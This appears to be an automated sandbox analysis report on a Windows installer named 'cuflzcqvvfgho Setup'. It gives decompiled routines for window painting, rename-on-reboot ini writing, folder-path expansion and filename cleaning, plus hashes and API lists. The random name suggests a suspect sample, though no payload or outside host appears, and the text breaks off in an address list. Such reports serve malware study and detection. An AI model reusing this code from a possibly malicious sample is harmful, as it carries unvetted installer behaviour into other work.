                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                                            • String ID:
                                            • API String ID: 2750380209-0
                                            • Opcode ID: 060b7b50325a49fbfb4ba781b538767780c96e33ced6d7a07db1b916ad805c3a
                                            • Instruction ID: 177151cf2cf71aa043f14ca26211adcba27faaf0a2f7b92520ec25653c0f1c6f
                                            • Opcode Fuzzy Hash: 060b7b50325a49fbfb4ba781b538767780c96e33ced6d7a07db1b916ad805c3a
                                            • Instruction Fuzzy Hash: 80E18FB49087458FE760DF28C58875BBBE4FB88354F10892EE89987394DB759548CF43
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x661638
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "cuflzcqvvfgho Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0x5024c
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                            0x0040100a
                                            0x00401039
                                            0x00401047
                                            0x0040104d
                                            0x00401051
                                            0x0040105b
                                            0x00401061
                                            0x00401064
                                            0x004010f3
                                            0x00401089
                                            0x0040108c
                                            0x004010a6
                                            0x004010bd
                                            0x004010cc
                                            0x004010cf
                                            0x004010d5
                                            0x004010d9
                                            0x004010e4
                                            0x004010ed
                                            0x004010ef
                                            0x004010ef
                                            0x00401100
                                            0x00401105
                                            0x0040110d
                                            0x00401110
                                            0x00401112
                                            0x00401118
                                            0x0040111f
                                            0x00401126
                                            0x00401130
                                            0x00401142
                                            0x00401156
                                            0x00401160
                                            0x00401165
                                            0x00401165
                                            0x00401110
                                            0x0040116e
                                            0x00000000
                                            0x00401178
                                            0x00401010
                                            0x00401013
                                            0x00401015
                                            0x00401019
                                            0x0040101f
                                            0x0040101f
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32 ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32 ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,cuflzcqvvfgho Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F$cuflzcqvvfgho Setup
                                            • API String ID: 941294808-738713911
                                            • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                            • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                            • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                            • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x661638
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                            0x004058ec
                                            0x004058f3
                                            0x004058f7
                                            0x00405900
                                            0x00405904
                                            0x00405a43
                                            0x00405a43
                                            0x00000000
                                            0x00405a43
                                            0x00405904
                                            0x00405910
                                            0x00405926
                                            0x0040594e
                                            0x00405959
                                            0x0040595d
                                            0x0040597d
                                            0x0040597f
                                            0x00405984
                                            0x0040598e
                                            0x0040599b
                                            0x004059a0
                                            0x004059a5
                                            0x004059a9
                                            0x00000000
                                            0x00000000
                                            0x004059b8
                                            0x004059ba
                                            0x004059c7
                                            0x004059cb
                                            0x00405a3c
                                            0x00405a3d
                                            0x00000000
                                            0x004059e7
                                            0x004059f4
                                            0x00405a59
                                            0x00405a60
                                            0x00405a07
                                            0x00405a07
                                            0x00405a09
                                            0x00405a12
                                            0x00405a1d
                                            0x00405a2f
                                            0x00405a36
                                            0x00000000
                                            0x00405a36
                                            0x00405a62
                                            0x00405a63
                                            0x00405a68
                                            0x00405a6a
                                            0x00405a77
                                            0x00405a77
                                            0x00405a7b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405a6c
                                            0x00405a6c
                                            0x00405a6f
                                            0x00405a72
                                            0x00405a73
                                            0x00000000
                                            0x00405a6c
                                            0x004059ff
                                            0x00405a04
                                            0x00000000
                                            0x00405a04
                                            0x004059cb
                                            0x00405928
                                            0x00405933
                                            0x0040593c
                                            0x00405940
                                            0x00000000
                                            0x00000000
                                            0x00405940
                                            0x00405a4d

                                            APIs
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                            • GetShortPathNameA.KERNEL32 ref: 0040593C
                                            • GetShortPathNameA.KERNEL32 ref: 00405959
                                            • wsprintfA.USER32 ref: 00405977
                                            • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                            • GlobalFree.KERNEL32 ref: 00405A36
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                              • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                              • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                            • String ID: %s=%s$@!B$[Rename]
                                            • API String ID: 3445103937-2946522640
                                            • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                            • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                            • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                            • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x666dd3
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x6656e0
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74261340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                                            0x00405bba
                                            0x00405bba
                                            0x00405bba
                                            0x00405bc0
                                            0x00405bc5
                                            0x00405bc7
                                            0x00405bd6
                                            0x00405bd6
                                            0x00405bd8
                                            0x00405be1
                                            0x00405be3
                                            0x00405be8
                                            0x00405beb
                                            0x00405bec
                                            0x00405bf3
                                            0x00405bf5
                                            0x00405bfb
                                            0x00405bfe
                                            0x00405bfe
                                            0x00405dd7
                                            0x00405dd7
                                            0x00405ddb
                                            0x00000000
                                            0x00000000
                                            0x00405c0b
                                            0x00405c11
                                            0x00000000
                                            0x00000000
                                            0x00405c17
                                            0x00405c18
                                            0x00405c1b
                                            0x00405c1e
                                            0x00405dca
                                            0x00405dd4
                                            0x00405dd6
                                            0x00405dd6
                                            0x00405dcc
                                            0x00405dce
                                            0x00405dd0
                                            0x00405dd1
                                            0x00405dd1
                                            0x00000000
                                            0x00405dca
                                            0x00405c24
                                            0x00405c28
                                            0x00405c38
                                            0x00405c3c
                                            0x00405c43
                                            0x00405c46
                                            0x00405c4a
                                            0x00405c50
                                            0x00405c53
                                            0x00405c56
                                            0x00405c59
                                            0x00405d74
                                            0x00405d77
                                            0x00405da7
                                            0x00405daa
                                            0x00405daf
                                            0x00405db3
                                            0x00405db3
                                            0x00405db8
                                            0x00405db9
                                            0x00405dbe
                                            0x00405dc1
                                            0x00405dc3
                                            0x00000000
                                            0x00405dc3
                                            0x00405d79
                                            0x00405d7c
                                            0x00405d91
                                            0x00405d98
                                            0x00405d7e
                                            0x00405d85
                                            0x00405d85
                                            0x00405da0
                                            0x00405da3
                                            0x00405d6c
                                            0x00405d6d
                                            0x00405d6d
                                            0x00000000
                                            0x00405da3
                                            0x00405c61
                                            0x00405c62
                                            0x00405c68
                                            0x00405c6a
                                            0x00405c84
                                            0x00405c84
                                            0x00405c8b
                                            0x00405c8b
                                            0x00405c92
                                            0x00405c96
                                            0x00405c96
                                            0x00405c97
                                            0x00405c99
                                            0x00405cd2
                                            0x00405cd5
                                            0x00405ce5
                                            0x00405ce8
                                            0x00405cf0
                                            0x00405cf6
                                            0x00405cf6
                                            0x00405d52
                                            0x00405d52
                                            0x00405d54
                                            0x00000000
                                            0x00000000
                                            0x00405cfa
                                            0x00405d01
                                            0x00405d02
                                            0x00405d04
                                            0x00405d1e
                                            0x00405d2c
                                            0x00405d32
                                            0x00405d34
                                            0x00405d4f
                                            0x00405d4f
                                            0x00405d4f
                                            0x00000000
                                            0x00405d4f
                                            0x00405d3a
                                            0x00405d45
                                            0x00405d4b
                                            0x00405d4d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d4d
                                            0x00405d06
                                            0x00405d09
                                            0x00000000
                                            0x00000000
                                            0x00405d18
                                            0x00405d1a
                                            0x00405d1c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d1c
                                            0x00000000
                                            0x00405d52
                                            0x00405cdd
                                            0x00000000
                                            0x00405c9b
                                            0x00405ca0
                                            0x00405cb6
                                            0x00405cbb
                                            0x00405cbe
                                            0x00405d5b
                                            0x00405d5b
                                            0x00405d5f
                                            0x00405d67
                                            0x00405d67
                                            0x00000000
                                            0x00405d5f
                                            0x00405cc8
                                            0x00405d56
                                            0x00405d56
                                            0x00405d59
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405d59
                                            0x00405c99
                                            0x00405c6c
                                            0x00405c70
                                            0x00000000
                                            0x00000000
                                            0x00405c72
                                            0x00405c76
                                            0x00000000
                                            0x00000000
                                            0x00405c78
                                            0x00405c7c
                                            0x00000000
                                            0x00405c7e
                                            0x00405c7e
                                            0x00000000
                                            0x00405c7e
                                            0x00405c7c
                                            0x00405de1
                                            0x00405deb
                                            0x00405df7
                                            0x00405df7
                                            0x00000000

                                            APIs
                                            • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                            • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                            • GetWindowsDirectoryA.KERNEL32(cuwawvnlx,00000400), ref: 00405CF0
                                            • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                            • SHGetPathFromIDListA.SHELL32(0040F0E0,cuwawvnlx), ref: 00405D3A
                                            • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                            • lstrcatA.KERNEL32(cuwawvnlx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                            • lstrlenA.KERNEL32(cuwawvnlx,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$cuwawvnlx
                                            • API String ID: 900638850-2371621835
                                            • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                            • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                            • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                            • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10003A80, Relevance: 16.7, APIs: 11, Instructions: 154fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateErrorFileLast$CloseHandle
                                            • String ID:
                                            • API String ID: 3924142190-0
                                            • Opcode ID: a3f0ac7604f3a7c51a52708cf5db40be82665f8cc9abde664eaed597f5aa6f52
                                            • Instruction ID: 8888709ac1b3f990a25a7769e21d0d637b6beb4763b8573e383d9fe45ee70f20
                                            • Opcode Fuzzy Hash: a3f0ac7604f3a7c51a52708cf5db40be82665f8cc9abde664eaed597f5aa6f52
                                            • Instruction Fuzzy Hash: A271B4B4904359CFEB00DFA8C58879EBBF4FB48354F10892AE855A7384D7759A44CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 100025C0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: W$decode failure: data corruption or bug.$z
                                            • API String ID: 0-3221231465
                                            • Opcode ID: a7d240e89eb60e92831f35ab80898345cb7366ee939d29a2f2fc4bdf1b1aca2b
                                            • Instruction ID: 802b19b310518d7462d5cf6b4c3dcf35393c441b6e37b90adf612b12b8719041
                                            • Opcode Fuzzy Hash: a7d240e89eb60e92831f35ab80898345cb7366ee939d29a2f2fc4bdf1b1aca2b
                                            • Instruction Fuzzy Hash: 16F1A174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E849A7354D734A981CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                            0x00405dfc
                                            0x00405e04
                                            0x00405e18
                                            0x00405e18
                                            0x00405e1e
                                            0x00405e2b
                                            0x00405e2b
                                            0x00405e2c
                                            0x00405e2e
                                            0x00405e32
                                            0x00405e34
                                            0x00405e3d
                                            0x00405e3f
                                            0x00405e59
                                            0x00405e61
                                            0x00405e61
                                            0x00405e66
                                            0x00405e68
                                            0x00405e6a
